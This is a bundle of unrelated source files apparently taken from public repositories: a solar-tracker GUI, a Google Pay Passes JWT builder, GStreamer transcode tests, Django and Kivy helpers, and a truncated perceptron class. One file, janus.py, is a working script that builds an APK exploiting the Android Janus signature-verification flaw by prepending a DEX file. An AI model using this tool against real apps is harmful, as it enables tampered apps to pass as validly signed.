    Proportions: drawing pane 2/3 width x 3/5 height (top-left), plots pane
    below it, log panel in the remaining right third; then the dial drawing
    is regenerated for the new drawlist size.
    """
    # get the main_window dimension
    w , h = dpg.get_item_width( 'mainWindow' ), dpg.get_item_height( 'mainWindow' )
    dpg.configure_item( 21_0 , width = w*2/3 , height = h*3/5 , pos = [10 , 25 ] ) # DRAWING
    dpg.configure_item( 22_0 , width = w*2/3 , height = (h*2/5)-35 , pos = [10 , (h*3/5)+30 ] ) # SUNPATH
    dpg.configure_item( 23_0 , width = w/3 -20 , height = h - 30 , pos = [ w*2/3 +15, 25 ] ) # LOG
    # get the child_window_window dimension
    w1, h1 = dpg.get_item_width( 21_0 ), dpg.get_item_height( 21_0 )
    dpg.configure_item( 21_10 , width = w1-20 , height = h1-50 ) # DRAWLIST
    update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 ) # DRAWING
    # SUNPATH ATT CHILD_WINDOW
    dpg.configure_item( 22_10 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ 5 , 20 ] ) # GIRO
    dpg.configure_item( 22_20 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ (w*2/3)//2 +5, 20 ] ) # ELEVAÇÃO
def render_visualizacaoGeral( ):
    """Per-frame update of the "Visualizacao geral" view.

    Reads either the controller clock (automatic mode) or the operator-entered
    date (manual mode), pushes the resulting sun data into the log-panel
    widgets and refreshes the trajectory dial and the day plots.
    """
    # NOTE: the module-level names (TOT_SECONDS, YEAR, ...) are only read via
    # dpg here, never rebound, so the previous `global` declarations were removed.
    # Automatic time
    if dpg.get_value( HORA_MANUAL ) == False :
        SUN_DATA.update_date()
        dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] ) # automatic date
        dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] ) # automatic time
        dpg.hide_item( 23_2_0 )
        dpg.show_item( 23_1_0 )
    # Manual time
    else:
        yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
        hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
        try:
            data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
            dt.datetime.timestamp( data )  # raises if the date cannot be represented
            SUN_DATA.set_date( data )
            SUN_DATA.update()
            dpg.set_value(YEAR , yearm )
            dpg.set_value(MONTH , monthm )
            dpg.set_value(DAY , daym )
            dpg.set_value(HOUR , hourm )
            dpg.set_value(MINUTE, minutem)
            dpg.set_value(SECOND, secondm)
        except Exception:
            # Invalid operator input (e.g. Feb 30): keep the previous date.
            # Narrowed from a bare `except:` so KeyboardInterrupt is not swallowed.
            pass
        # Seconds elapsed in the day and Julian day
        dpg.set_value( 23_9, SUN_DATA.dia_juliano ) # Julian day
        dpg.set_value( 23_8, SUN_DATA.total_seconds) # total seconds
        dpg.hide_item( 23_1_0 )
        dpg.show_item( 23_2_0 )
    # Azimuth, altitude and elevation read-outs
    dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) ) # azimuth
    dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) ) # altitude
    dpg.set_value( 23_14, SUN_DATA.altitude ) # elevation
    # Hours of sunlight, split into h/m/s from the rising -> sunset delta
    diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
    dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
    # Sunrise, culmination (highest point) and sunset, shifted to local time
    dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] ) # sunrise
    dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] ) # culmination
    dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] ) # sunset
    update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
    att_sunpos_graphs()
python/jwt.py | angelbarranco/passes-rest-samples | 95 | 16973 | <gh_stars>10-100
"""
Copyright 2019 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import config
import time
# for jwt signing. see https://google-auth.readthedocs.io/en/latest/reference/google.auth.jwt.html#module-google.auth.jwt
from google.auth import crypt as cryptGoogle
from google.auth import jwt as jwtGoogle
#############################
#
# class that defines JWT format for a Google Pay Pass.
#
# to check the JWT protocol for Google Pay Passes, check:
# https://developers.google.com/pay/passes/reference/s2w-reference#google-pay-api-for-passes-jwt
#
# also demonstrates RSA-SHA256 signing implementation to make the signed JWT used
# in links and buttons. Learn more:
# https://developers.google.com/pay/passes/guides/get-started/implementing-the-api/save-to-google-pay
#
#############################
class googlePassJwt:
    """Builder for a Google Pay Passes "Save to Phone" JWT.

    Pass classes/objects are accumulated into ``self.payload`` via the
    ``add*`` methods, and the final JWT is signed with RSA-SHA256 using
    the OAuth2 service-account private key.

    JWT format reference:
    https://developers.google.com/pay/passes/reference/s2w-reference#google-pay-api-for-passes-jwt
    """

    def __init__(self):
        self.audience = config.AUDIENCE
        self.type = config.JWT_TYPE
        self.iss = config.SERVICE_ACCOUNT_EMAIL_ADDRESS
        self.origins = config.ORIGINS
        self.iat = int(time.time())  # issued-at claim, epoch seconds
        self.payload = {}
        # Signer for RSA-SHA256; uses the same private key used for OAuth2.0.
        self.signer = cryptGoogle.RSASigner.from_service_account_file(config.SERVICE_ACCOUNT_FILE)

    def _addToPayload(self, key, resourcePayload):
        """Append ``resourcePayload`` to the payload list named ``key``,
        creating the list on first use. Shared by all add* methods."""
        self.payload.setdefault(key, [])
        self.payload[key].append(resourcePayload)

    def addOfferClass(self, resourcePayload):
        self._addToPayload('offerClasses', resourcePayload)

    def addOfferObject(self, resourcePayload):
        self._addToPayload('offerObjects', resourcePayload)

    def addLoyaltyClass(self, resourcePayload):
        self._addToPayload('loyaltyClasses', resourcePayload)

    def addLoyaltyObject(self, resourcePayload):
        self._addToPayload('loyaltyObjects', resourcePayload)

    def addGiftcardClass(self, resourcePayload):
        self._addToPayload('giftCardClasses', resourcePayload)

    def addGiftcardObject(self, resourcePayload):
        self._addToPayload('giftCardObjects', resourcePayload)

    def addEventTicketClass(self, resourcePayload):
        self._addToPayload('eventTicketClasses', resourcePayload)

    def addEventTicketObject(self, resourcePayload):
        self._addToPayload('eventTicketObjects', resourcePayload)

    def addFlightClass(self, resourcePayload):
        self._addToPayload('flightClasses', resourcePayload)

    def addFlightObject(self, resourcePayload):
        self._addToPayload('flightObjects', resourcePayload)

    def addTransitClass(self, resourcePayload):
        self._addToPayload('transitClasses', resourcePayload)

    def addTransitObject(self, resourcePayload):
        self._addToPayload('transitObjects', resourcePayload)

    def generateUnsignedJwt(self):
        """Return the unsigned JWT claim set as a dict."""
        return {
            'iss': self.iss,
            'aud': self.audience,
            'typ': self.type,
            'iat': self.iat,
            'payload': self.payload,
            'origins': self.origins,
        }

    def generateSignedJwt(self):
        """Sign the claim set and return the encoded JWT."""
        return jwtGoogle.encode(self.signer, self.generateUnsignedJwt())
| 2 | 2 |
janus.py | caxmd/januus | 83 | 16974 | <filename>janus.py
# Includes some code derived from the cpython project.
# Source: https://github.com/python/cpython/blob/master/Lib/zipfile.py
# Excuse the mess.
import argparse
from hashlib import sha1
import os
import struct
from zipfile import _EndRecData, ZipFile
from zlib import adler32
# Indices into the End-of-Central-Directory record list returned by
# zipfile._EndRecData.
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6  # offset of the central directory from the start of the file
_ECD_COMMENT_SIZE = 7
structEndArchive = b"<4s4H2LH"  # struct format of the fixed part of the EOCD record
stringEndArchive = b"PK\005\006"  # EOCD record signature
structCentralDir = "<4s4B4HL2L5H2L"  # struct format of a central-directory file header
stringCentralDir = b"PK\001\002"  # central-directory file header signature
# Indices into the DEX header field list produced by get_dex_header.
_DEX_MAGIC = 0
_DEX_CHECKSUM = 1
_DEX_SIGNATURE = 2
_DEX_FILE_SIZE = 3
structDexHeader = "<8sI20sI"  # magic, adler32 checksum, SHA-1 signature, file size
def get_centdirs(filelist):
    """Serialize the central-directory records for a list of ZipInfo objects.

    Mirrors ZipFile's own central-directory writer; each record reflects
    the ZipInfo's current (possibly shifted) ``header_offset`` and
    (possibly altered) ``date_time``.
    """
    arr = b""
    for zinfo in filelist:
        # Convert the (Y, M, D, h, m, s) tuple into packed DOS date/time
        # words (seconds are stored with 2-second resolution).
        dt = zinfo.date_time
        dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
        dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
        file_size = zinfo.file_size
        compress_size = zinfo.compress_size
        header_offset = zinfo.header_offset
        extra_data = zinfo.extra
        min_version = 0
        extract_version = max(min_version, zinfo.extract_version)
        create_version = max(min_version, zinfo.create_version)
        # _encodeFilenameFlags is a ZipInfo internal: returns the encoded
        # filename plus flag bits (UTF-8 flag set when needed).
        filename, flag_bits = zinfo._encodeFilenameFlags()
        centdir = struct.pack(structCentralDir,
                              stringCentralDir, create_version,
                              zinfo.create_system, extract_version, zinfo.reserved,
                              flag_bits, zinfo.compress_type, dostime, dosdate,
                              zinfo.CRC, compress_size, file_size,
                              len(filename), len(extra_data), len(zinfo.comment),
                              0, zinfo.internal_attr, zinfo.external_attr,
                              header_offset)
        # Fixed header followed by the three variable-length fields.
        arr += centdir
        arr += filename
        arr += extra_data
        arr += zinfo.comment
    return arr
def pack_endrec(endrec):
    """Serialize the eight fixed EOCD fields back into their on-disk form.

    ``endrec`` may carry extra trailing entries (comment, concatenation
    offset); only the fixed-size fields are packed.
    """
    fields = (
        endrec[_ECD_SIGNATURE],
        endrec[_ECD_DISK_NUMBER],
        endrec[_ECD_DISK_START],
        endrec[_ECD_ENTRIES_THIS_DISK],
        endrec[_ECD_ENTRIES_TOTAL],
        endrec[_ECD_SIZE],
        endrec[_ECD_OFFSET],
        endrec[_ECD_COMMENT_SIZE],
    )
    return struct.pack(structEndArchive, *fields)
def get_endrec(file):
    """Read the End-of-Central-Directory record from ``file`` without
    disturbing the caller's file position."""
    saved_pos = file.tell()
    endrec = _EndRecData(file)
    file.seek(saved_pos)
    return endrec
def sort_info(info):
    """Sort key that pushes META-INF entries (signature files) behind
    all other archive members."""
    return "Z" if info.filename.startswith("META-INF") else "A"
def get_dex_header(data):
    """Unpack the first 0x24 bytes of a DEX file into a mutable field list:
    [magic, adler32 checksum, SHA-1 signature, file size]."""
    magic, checksum, signature, file_size = struct.unpack(structDexHeader, data[:0x24])
    return [magic, checksum, signature, file_size]
def pack_dex_header(header):
    """Serialize the four DEX header fields back into their on-disk form."""
    magic, checksum, signature, file_size = header[:4]
    return struct.pack(structDexHeader, magic, checksum, signature, file_size)
def make_dex_header(header, file_data, final_size):
    """Finalize the DEX header for the combined DEX+APK blob.

    Mutates ``header`` in place and returns the packed 0x24-byte header.
    Field order matters: each integrity field covers the bytes that
    follow it, so file size is set first, then the SHA-1 signature
    (over everything after the signature field, i.e. offset 0x20 of the
    header plus ``file_data``), then the adler32 checksum (over
    everything after the checksum field: signature + tail + file_data).
    """
    header[_DEX_FILE_SIZE] = final_size
    packed_header = pack_dex_header(header)
    signature = sha1()
    # packed_header[0x20:] is the 4-byte file-size field that follows the
    # 20-byte signature in the header layout.
    signature.update(packed_header[0x20:] + file_data)
    header[_DEX_SIGNATURE] = signature.digest()
    header[_DEX_CHECKSUM] = adler32(
        header[_DEX_SIGNATURE] +
        packed_header[0x20:] +
        file_data
    )
    return pack_dex_header(header)
parser = argparse.ArgumentParser(description="Creates an APK exploiting the Janus vulnerability.")
parser.add_argument("apk_in", metavar="original-apk", type=str,
                    help="the source apk to use")
parser.add_argument("dex_in", metavar="dex-file", type=str,
                    help="the dex file to prepend")
parser.add_argument("apk_out", metavar="output-apk", type=str,
                    help="the file to output to")
args = parser.parse_args()
# Build the output: the DEX body is prepended to the APK, every ZIP offset
# is shifted by the DEX size, and a fresh DEX header is computed so the
# result parses as both a DEX file and a ZIP/APK.
with ZipFile(args.apk_in, "r") as apk_in_zip, open(args.apk_in, "rb") as apk_in, open(args.dex_in, "rb") as dex_in, open(args.apk_out, "wb") as apk_out:
    dex_data = dex_in.read()
    dex_header = get_dex_header(dex_data)
    dex_size = os.path.getsize(args.dex_in)
    # Two independent copies of the EOCD: one keeps the original central
    # directory offset (for slicing), the other gets the shifted offset.
    orig_endrec = get_endrec(apk_in)
    new_endrec = get_endrec(apk_in)
    new_endrec[_ECD_OFFSET] = new_endrec[_ECD_OFFSET] + dex_size
    final_size = os.path.getsize(args.apk_in) + dex_size
    # Push META-INF (signature) entries to the end of the central directory.
    apk_in_zip.filelist = sorted(apk_in_zip.filelist, key=sort_info)
    infolist = apk_in_zip.infolist()
    for info in infolist:
        # NOTE(review): deliberately out-of-range date fields (month 14,
        # minute 62) — presumably intentional for this PoC; confirm.
        info.date_time = (2042, 14, 3, 0, 62, 18)
        info.header_offset = info.header_offset + dex_size
    # Assemble: DEX body (sans header) + original APK data up to the old
    # central directory + rebuilt central directory + patched EOCD.
    out_bytes = b""
    out_bytes += dex_data[0x24:]
    out_bytes += apk_in.read()[:orig_endrec[_ECD_OFFSET]]
    out_bytes += get_centdirs(infolist)
    out_bytes += pack_endrec(new_endrec)
    # Finally prepend the recomputed DEX header covering the whole blob.
    out_bytes = make_dex_header(dex_header, out_bytes, final_size) + out_bytes
    apk_out.write(out_bytes)
constants.py | phy1um/tmtc-discord-bot | 0 | 16975 |
# Discord snowflake IDs, stored as strings.
ANNOUNCEMENT_ROLE = "941805571915513857"  # role allowed to trigger/receive announcements — confirm against bot usage
GUILD_ID = "878926572235665418"  # the guild (server) the bot operates in
| 0.953125 | 1 |
test/gst-msdk/transcode/mpeg2.py | haribommi/vaapi-fits | 0 | 16976 | ##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .transcoder import TranscoderTest
spec = load_test_spec("mpeg2", "transcode")
class to_avc(TranscoderTest):
  """MPEG-2 -> AVC (H.264) transcode cases using MSDK hardware elements."""
  @slash.requires(*have_gst_element("msdkh264enc"))
  @slash.requires(*have_gst_element("msdkh264dec"))
  @slash.requires(*have_gst_element("msdkmpeg2dec"))
  @slash.parametrize(*gen_transcode_1to1_parameters(spec, "avc", "hwhw"))
  @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(AVC_ENCODE_PLATFORMS))
  def test_hwhw_1to1(self, case):
    # Start from the spec entry for this case, then layer on the
    # hardware-decode / hardware-encode pipeline parameters.
    params = dict(spec[case])
    params.update(
      dstextension='h264',
      case=case,
      mode='hwhw',
      trans_type='mpeg2_to_h264',
      gsttrans='mpegvideoparse ! msdkmpeg2dec ! msdkh264enc ! video/x-h264,profile=main ! h264parse',
      gstdecoder1='mpegvideoparse ! msdkmpeg2dec',
      gstdecoder2='h264parse ! msdkh264dec',
    )
    vars(self).update(params)
    self.transcode_1to1()
class to_hevc(TranscoderTest):
  """MPEG-2 -> HEVC (H.265) transcode cases using MSDK hardware elements."""
  @slash.requires(*have_gst_element("msdkh265enc"))
  @slash.requires(*have_gst_element("msdkh265dec"))
  @slash.requires(*have_gst_element("msdkmpeg2dec"))
  @slash.parametrize(*gen_transcode_1to1_parameters(spec, "hevc", "hwhw"))
  @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(HEVC_ENCODE_8BIT_PLATFORMS))
  def test_hwhw_1to1(self, case):
    # Spec-provided parameters first, then the pipeline definition.
    params = dict(spec[case])
    params.update(
      dstextension='h265',
      case=case,
      mode='hwhw',
      trans_type='mpeg2_to_h265',
      gsttrans='mpegvideoparse ! msdkmpeg2dec ! msdkh265enc ! video/x-h265,profile=main ! h265parse',
      gstdecoder1='mpegvideoparse ! msdkmpeg2dec',
      gstdecoder2='h265parse ! msdkh265dec',
    )
    vars(self).update(params)
    self.transcode_1to1()
class to_mjpeg(TranscoderTest):
  """MPEG-2 -> MJPEG transcode cases using MSDK hardware elements."""
  @slash.requires(*have_gst_element("msdkmjpegenc"))
  @slash.requires(*have_gst_element("msdkmjpegdec"))
  @slash.requires(*have_gst_element("msdkmpeg2dec"))
  @slash.parametrize(*gen_transcode_1to1_parameters(spec, "mjpeg", "hwhw"))
  @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(JPEG_ENCODE_PLATFORMS))
  def test_hwhw_1to1(self, case):
    # Spec-provided parameters first, then the pipeline definition.
    params = dict(spec[case])
    params.update(
      dstextension='mjpeg',
      case=case,
      mode='hwhw',
      trans_type='mpeg2_to_mjpeg',
      gsttrans='mpegvideoparse ! msdkmpeg2dec ! msdkmjpegenc ! jpegparse',
      gstdecoder1='mpegvideoparse ! msdkmpeg2dec',
      gstdecoder2='jpegparse ! msdkmjpegdec',
    )
    vars(self).update(params)
    self.transcode_1to1()
class to_mpeg2(TranscoderTest):
  """MPEG-2 -> MPEG-2 re-encode cases using MSDK hardware elements."""
  @slash.requires(*have_gst_element("msdkmpeg2enc"))
  @slash.requires(*have_gst_element("msdkmpeg2dec"))
  @slash.parametrize(*gen_transcode_1to1_parameters(spec, "mpeg2", "hwhw"))
  @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(MPEG2_ENCODE_PLATFORMS))
  def test_hwhw_1to1(self, case):
    # Spec-provided parameters first, then the pipeline definition.
    params = dict(spec[case])
    params.update(
      dstextension='m2v',
      case=case,
      mode='hwhw',
      trans_type='mpeg2_to_mpeg2',
      gsttrans='mpegvideoparse ! msdkmpeg2dec ! msdkmpeg2enc ! mpegvideoparse',
      gstdecoder1='mpegvideoparse ! msdkmpeg2dec',
      gstdecoder2='mpegvideoparse ! msdkmpeg2dec',
    )
    vars(self).update(params)
    self.transcode_1to1()
| 2.0625 | 2 |
rusel/base/context.py | ruslan-ok/ruslan | 0 | 16977 | import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
    """Mixin that assembles the common template context (title, sidebar
    "fixes", groups, navigation items) for an application's views."""

    def set_config(self, config, cur_view):
        # Wrap the raw per-app config in a Config bound to the current view.
        self.config = Config(config, cur_view)

    def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
        """Build the base context dict shared by list and detail pages."""
        context = {}
        # Title preference: current object's name, then explicit kwarg,
        # then the (translated) app title from config.
        if hasattr(self, 'object') and self.object:
            title = self.object.name
        else:
            if 'title' in kwargs:
                title = kwargs['title']
            else:
                title = _(self.config.title).capitalize()
        nav_item = None
        if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
            nav_item = Task.get_active_nav_item(user_id, self.config.app)
            if nav_item:
                # Two-part title: (page title, active nav item name).
                title = (title, nav_item.name)
                context['nav_item'] = nav_item
        context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
        context['fix_list'] = self.get_fixes(self.config.views, search_qty)
        context['group_form'] = CreateGroupForm()
        context['config'] = self.config
        context['params'] = extract_get_params(self.request, self.config.group_entity)
        if nav_items:
            context['nav_items'] = nav_items
        context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
        # Button-style vs. inline-input "add item" widget.
        if self.config.add_button:
            context['add_item_template'] = 'base/add_item_button.html'
        else:
            context['add_item_template'] = 'base/add_item_input.html'
        # Remember which group the user came from (query param or 'ret').
        if (self.config.group_entity in self.request.GET):
            context['current_group'] = self.request.GET[self.config.group_entity]
        elif ('ret' in self.request.GET):
            context['current_group'] = self.request.GET['ret']
        return context

    def get_sorts(self, sorts):
        """Translate (id, label) sort pairs into template-ready dicts."""
        ret = []
        for sort in sorts:
            ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
        return ret

    def get_fixes(self, views, search_qty):
        """Build the sidebar entry ("fix") for every configured view."""
        fixes = []
        if (self.config.app == APP_ALL):
            common_url = reverse('index')
        else:
            common_url = reverse(self.config.app + ':list')
        nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
        for key, value in views.items():
            url = common_url
            determinator = 'view'
            view_id = self.config.main_view
            if (view_id != key):
                # Role-based views get their own URL segment; plain views
                # keep the key as their id.
                if ('role' in value):
                    determinator = 'role'
                    view_id = value['role']
                    url += view_id + '/'
                else:
                    view_id = key
            if (key != self.config.main_view):
                if ('page_url' in value):
                    url += value['page_url'] + '/'
                else:
                    url += '?view=' + key
            # Apps with folder navigation carry the folder through the URL.
            if (self.config.app in FOLDER_NAV_APPS):
                folder = ''
                if ('folder' in self.request.GET):
                    folder = self.request.GET['folder']
                if folder:
                    if ('?' in url):
                        url += '&'
                    else:
                        url += '?'
                    url += 'folder=' + folder
            hide_qty = False
            if ('hide_qty' in value):
                hide_qty = value['hide_qty']
            if hide_qty:
                qty = None
            else:
                # Group-entity views count across all nav items.
                if (view_id == self.config.group_entity):
                    _nav_item = None
                else:
                    _nav_item = nav_item
                fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
                qty = self.get_view_qty(fix_group, _nav_item)
            active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
            fix = {
                'determinator': determinator,
                'id': view_id,
                'url': url,
                'icon': value['icon'],
                'title': _(value['title']).capitalize(),
                'qty': qty,
                'active': active,
                'search_qty': search_qty,
            }
            fixes.append(fix)
        return fixes

    def get_view_qty(self, group, nav_item):
        """Number of tasks visible in the given group/nav-item combination."""
        data = self.get_dataset(group, nav_item=nav_item)
        return len(data)

    def get_dataset(self, group, query=None, nav_item=None):
        """Return the task queryset for a group, optionally narrowed by
        a nav item; delegates final tuning to ``tune_dataset`` if present."""
        if (group.determinator == 'role'):
            cur_role = group.view_id
        else:
            cur_role = self.config.base_role
        data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
        if (self.config.app == APP_ALL) and (not query):
            return data
        if data and ((not group.determinator) or (group.determinator == 'group')):
            data = data.filter(groups__id=group.id)
        # if (not group.completed):
        #     data = data.filter(completed=False)
        if hasattr(self, 'tune_dataset'):
            return self.tune_dataset(data, group)
        return data

    def get_nav_items(self):
        """Build the navigation-item list for apps that have a nav role,
        with per-item task counts; None when no nav panel applies."""
        nav_role = Task.get_nav_role(self.config.app)
        if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
            return None
        href = self.request.path
        # Strip a trailing '<pk>/' so item links point at the list page.
        if ('pk' in self.kwargs):
            pk = str(self.kwargs['pk']) + '/'
            if (pk in href):
                href = href.split(pk)[0]
        sort = 'name'
        nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
        if nav_item_group and nav_item_group.items_sort:
            sort = nav_item_group.items_sort
        ret = []
        for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
            ret.append({
                'id': item.id,
                'name': item.name,
                'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
                'href': href,
            })
        return ret
class DirContext(Context):
    """Context mixin for file-browser style views: builds a directory
    tree and a file listing rooted at ``self.store_dir``."""

    def get_context_data(self, **kwargs):
        """Assemble context for the current folder (``?folder=`` param)."""
        self.config.set_view(self.request)
        self.object = None
        self.cur_folder = ''
        page_title = ''
        title = ''
        if ('folder' in self.request.GET):
            self.cur_folder = self.request.GET['folder']
            # Page title is the last path component; full path is the title.
            page_title = self.cur_folder.split('/')[-1:][0]
            title = self.cur_folder
        if not self.cur_folder:
            page_title = _(self.config.app_title)
            title = page_title
        kwargs.update({'title': page_title})
        dir_tree = []
        self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
        # Populates self.file_list and self.gps_data as side effects.
        self.scan_files()
        # NOTE(review): self.object is reset a second time here — looks
        # redundant with the assignment above; confirm before removing.
        self.object = None
        context = super().get_context_data(**kwargs)
        upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
        context.update(upd_context)
        context['title'] = title
        context['dir_tree'] = dir_tree
        context['file_list'] = self.file_list
        context['gps_data'] = self.gps_data
        if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
            context['cur_view'] = self.config.cur_view_group.view_id
        context['theme_id'] = 24
        context['cur_folder'] = self.cur_folder
        return context

    def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
        """Recursively append one flat entry per subdirectory of ``path``
        to ``dir_tree``, tracking nesting level and the active folder.
        With demo=True only the first level is scanned."""
        ld = glob.glob(path + '/*/')
        if not len(ld):
            return
        node = ''
        level = 0
        if parent:
            # Build this entry's parent path ("node") from the parent entry.
            node = parent['node']
            if node:
                node += '/'
            node += parent['name']
            level = parent['level'] + 1
        s_node = node
        if node:
            s_node = node + '/'
        p = path
        for d in ld:
            dd = d.replace('\\', '/')
            name = dd.split(p)[1].strip('/')
            x = {
                'node': node,
                'name': name,
                'active': (cur_folder == s_node + name),
                'level': level,
                'qty': 0,
            }
            dir_tree.append(x)
            if not demo:
                self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)

    def scan_files(self):
        """Scan the current folder into self.file_list (skipping
        directories and Thumbs.db); resets self.gps_data to empty."""
        self.gps_data = []
        self.file_list = []
        with os.scandir(self.store_dir + self.cur_folder) as it:
            for entry in it:
                if (entry.name.upper() == 'Thumbs.db'.upper()):
                    continue
                if entry.is_dir():
                    continue
                ff = self.store_dir + self.cur_folder + '/' + entry.name
                mt = mimetypes.guess_type(ff)
                file_type = ''
                if mt and mt[0]:
                    file_type = mt[0]
                self.file_list.append({
                    'name': entry.name,
                    'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
                    'date': time.ctime(os.path.getmtime(ff)),
                    'type': file_type,
                    'size': self.sizeof_fmt(os.path.getsize(ff)),
                })
        return self.gps_data

    def sizeof_fmt(self, num, suffix='B'):
        """Render a byte count using binary (1024-based) unit prefixes."""
        for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
            if abs(num) < 1024.0:
                return f'{num:3.1f}{unit}{suffix}'
            num /= 1024.0
        return f'{num:.1f}Yi{suffix}'
| 1.90625 | 2 |
deepdiy/plugins/system/debugger/debugger.py | IEWbgfnYDwHRoRRSKtkdyMDUzgdwuBYgDKtDJWd/diy | 57 | 16978 | <filename>deepdiy/plugins/system/debugger/debugger.py
import os,rootpath
rootpath.append(pattern='main.py') # add the directory of main.py to PATH
import glob
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import ObjectProperty,DictProperty,ListProperty
from kivy.uix.boxlayout import BoxLayout
import logging,importlib,pkgutil
class Debugger(BoxLayout):
    """Widget that discovers every module under plugins/system/debugger
    and imports it, so each debug script's module-level code runs at
    startup. Import failures are logged, never raised."""
    data = ObjectProperty()
    debug_packages = ListProperty()  # dotted module names found by collect_debug_packages
    bundle_dir = rootpath.detect(pattern='main.py')  # Obtain the dir of main.py

    def __init__(self):
        super(Debugger, self).__init__()
        self.collect_debug_packages()
        self.run_debug_packages()

    def collect_debug_packages(self):
        """Walk the debugger plugin directory and record importable
        debug modules in ``self.debug_packages``."""
        for importer, modname, ispkg in pkgutil.walk_packages(
                path=[os.sep.join([self.bundle_dir, 'plugins', 'system', 'debugger'])],
                prefix='plugins.system.debugger.',
                onerror=lambda x: None):
            # Keep only modules nested inside a debug package (more than
            # four dotted components) and skip dunder/private entries.
            if len(modname.split('.')) > 4 and '__' not in modname:
                self.debug_packages.append(modname)

    def run_debug_packages(self):
        """Import each collected module for its side effects; log and
        continue on any failure so one bad script can't stop the rest."""
        for modname in self.debug_packages:
            try:
                importlib.import_module(modname)
            except Exception as e:
                logging.warning('Fail to load debug script <{}>: {}'.format(modname, e))
class Test(App):
    """Minimal Kivy app whose root widget is a Debugger (manual testing)."""
    data=ObjectProperty()
    plugins=DictProperty()
    def __init__(self):
        super(Test, self).__init__()
    def build(self):
        # Root widget: constructing Debugger imports the debug packages.
        demo=Debugger()
        return demo

if __name__ == '__main__':
    Test().run()
| 2.046875 | 2 |
supervised_learning/classification/perceptron/perceptron.py | Ambitious-idiot/python-machine-learning | 3 | 16979 | <gh_stars>1-10
import numpy as np
class Perceptron:
    """Binary linear classifier trained with the perceptron SGD rule."""

    def __init__(self, weight, bias=0):
        self.weight = weight
        self.bias = bias

    def __repr__(self):
        return 'Perceptron(weight=%r, bias=%r)' % (self.weight, self.bias)

    def __raw_scores(self, data):
        # Affine score(s): data . weight + bias; vectorized over rows.
        return np.dot(data, self.weight) + self.bias

    def sign(self, input_vec):
        """Classify one sample: -1 for a negative score, +1 otherwise
        (points exactly on the boundary are labeled +1)."""
        return -1 if self.__raw_scores(input_vec) < 0 else 1

    def __misclassified(self, dataset, labels):
        # A sample counts as misclassified when label * score <= 0.
        scores = self.__raw_scores(dataset)
        mask = scores * labels <= 0
        return dataset[mask], labels[mask], scores[mask]

    def __loss(self, dataset, labels):
